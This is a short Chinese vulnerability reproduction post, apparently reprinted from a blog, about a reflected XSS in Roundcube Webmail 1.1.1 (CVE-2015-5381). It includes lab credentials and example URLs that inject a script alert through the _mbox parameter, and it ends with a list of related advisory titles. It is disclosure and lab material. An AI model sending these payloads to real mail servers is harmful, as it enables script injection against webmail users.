Roundcube Webmail跨站脚本漏洞(CVE-2015-5381 )
Preface
Software: https://roundcube.net/
Versions: 1.1.x<1.1.2
CVE: CVE-2015-5381
Author: sroesemann
Release date: 2015-5-30
Reference
Roundcube Webmail跨站脚本漏洞(CNVD-2017-08082)
XSS via _mbox-parameter in Roundcube v.1.1.1
环境搭建
请参考:CentOS6 安装Sendmail + Dovecot + Roundcubemail
漏洞复现
需要有效的账号密码才能触发:user1/123456
本地环境:http://mail.roundcube.com/roundcubemail-1.1.1/
Example:
https://{YOURSERVER}/?_task=mail&_mbox=INBOX%22%3E%3Cscript%3Ealert(%22Roundcube+v1.1.1+XSS%22)%3C%2Fscript%3E
http://mail.roundcube.com/roundcubemail-1.1.1/?_task=mail&_mbox=INBOX%22%3E%3Cscript%3Ealert(%22Roundcube+v1.1.1+XSS%22)%3C%2Fscript%3E
XSS触发...
转载于:https://www.cnblogs.com/Hi-blog/p/8776374.html
Roundcube Webmail跨站脚本漏洞(CVE-2015-5381 )相关推荐
- Roundcube Webmail信息泄露漏洞(CVE-2015-5383)
Preface Software: https://roundcube.net/ Versions: 1.1.x<1.1.2(亲测1.1.5也有效) CVE: CVE-2015-5383 Aut ...
- Apache ‘mod_pagespeed’模块跨站脚本漏洞
漏洞名称: Apache 'mod_pagespeed'模块跨站脚本漏洞 CNNVD编号: CNNVD-201310-677 发布时间: 2013-11-05 更新时间: 2013-11-05 危害等 ...
- WordPress podPress插件‘playerID’参数跨站脚本漏洞
漏洞名称: WordPress podPress插件'playerID'参数跨站脚本漏洞 CNNVD编号: CNNVD-201303-206 发布时间: 2013-03-13 更新时间: 2013-0 ...
- phpMyAdmin import.php 跨站脚本漏洞
漏洞名称: phpMyAdmin import.php 跨站脚本漏洞 CNNVD编号: CNNVD-201402-281 发布时间: 2014-02-21 更新时间: 2014-02-21 危害等级: ...
- WordPress yolink Search插件‘s’参数跨站脚本漏洞
漏洞名称: WordPress yolink Search插件's'参数跨站脚本漏洞 CNNVD编号: CNNVD-201302-073 发布时间: 2013-02-05 更新时间: 2013-02- ...
- linux脚本漏洞,Silver Peak VX跨站脚本漏洞(CVE-2014-2975)
发布日期:2014-07-28 更新日期:2014-07-30 受影响系统: silver peak Silver Peak VX 描述: ------------------------------ ...
- Wordpress prettyPhoto插件跨站脚本漏洞
漏洞名称: Wordpress prettyPhoto插件跨站脚本漏洞 CNNVD编号: CNNVD-201311-413 发布时间: 2013-11-28 更新时间: 2013-11-28 危害等级 ...
- WordPress WP Photo Album Plus插件‘wppa-tag’跨站脚本漏洞
漏洞名称: WordPress WP Photo Album Plus插件'wppa-tag'跨站脚本漏洞 CNNVD编号: CNNVD-201301-458 发布时间: 2013-01-24 更新时 ...
- phpMyAdmin ‘tbl_gis_visualization.php’多个跨站脚本漏洞
漏洞名称: phpMyAdmin 'tbl_gis_visualization.php'多个跨站脚本漏洞 CNNVD编号: CNNVD-201304-152 发布时间: 2013-04-12 更新时间 ...
最新文章
- ROS学习(五):package.xml 文件
- java alsa 编程_搭建JavaWeb开发环境
- 顺序表的基本操作实验报告_INDIRECT函数从入门到进阶之相同顺序跨表引用
- UVA 10142 Australian Voting(模拟)
- 我回答的一个粉丝关于用编程语言模拟SAP事务的问题
- 亚伦•斯沃茨:提升时间的品质
- Python模块之MyQR——制作个性化动态二维码(超详细)
- 【华为云实战开发】1.传统Java项目怎么能变得高大上?
- HP服务器和H3C交换机端口绑定
- 电脑删除的文件去哪了?删除的数据恢复,居然有3个方法…
- 外汇EA是什么?外汇EA有什么用呢?能赚钱吗?
- 基于virtualbox 的虚拟路由器搭建
- golang中零停机重启服务之套接字复用,endless
- elementui去掉表格所有边框
- 这家自动驾驶公司在招聘感知实习研究员!
- 有线通信技术类毕业论文文献(推荐10篇)
- 电脑重装系统可能会遇到的几个问题
- Proteus8.9 VSM Studio GCC编译器仿真STM32F407ZGT6系列011_lcd1602_并口
- 触摸屏“G+G、G+P、G+F”是什么意思?
- BUILD_PREBUILT